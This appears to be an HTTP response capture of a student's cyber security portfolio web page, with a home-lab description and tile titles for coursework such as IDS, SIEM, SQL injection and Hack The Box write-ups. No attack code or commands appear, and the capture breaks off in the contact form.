          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
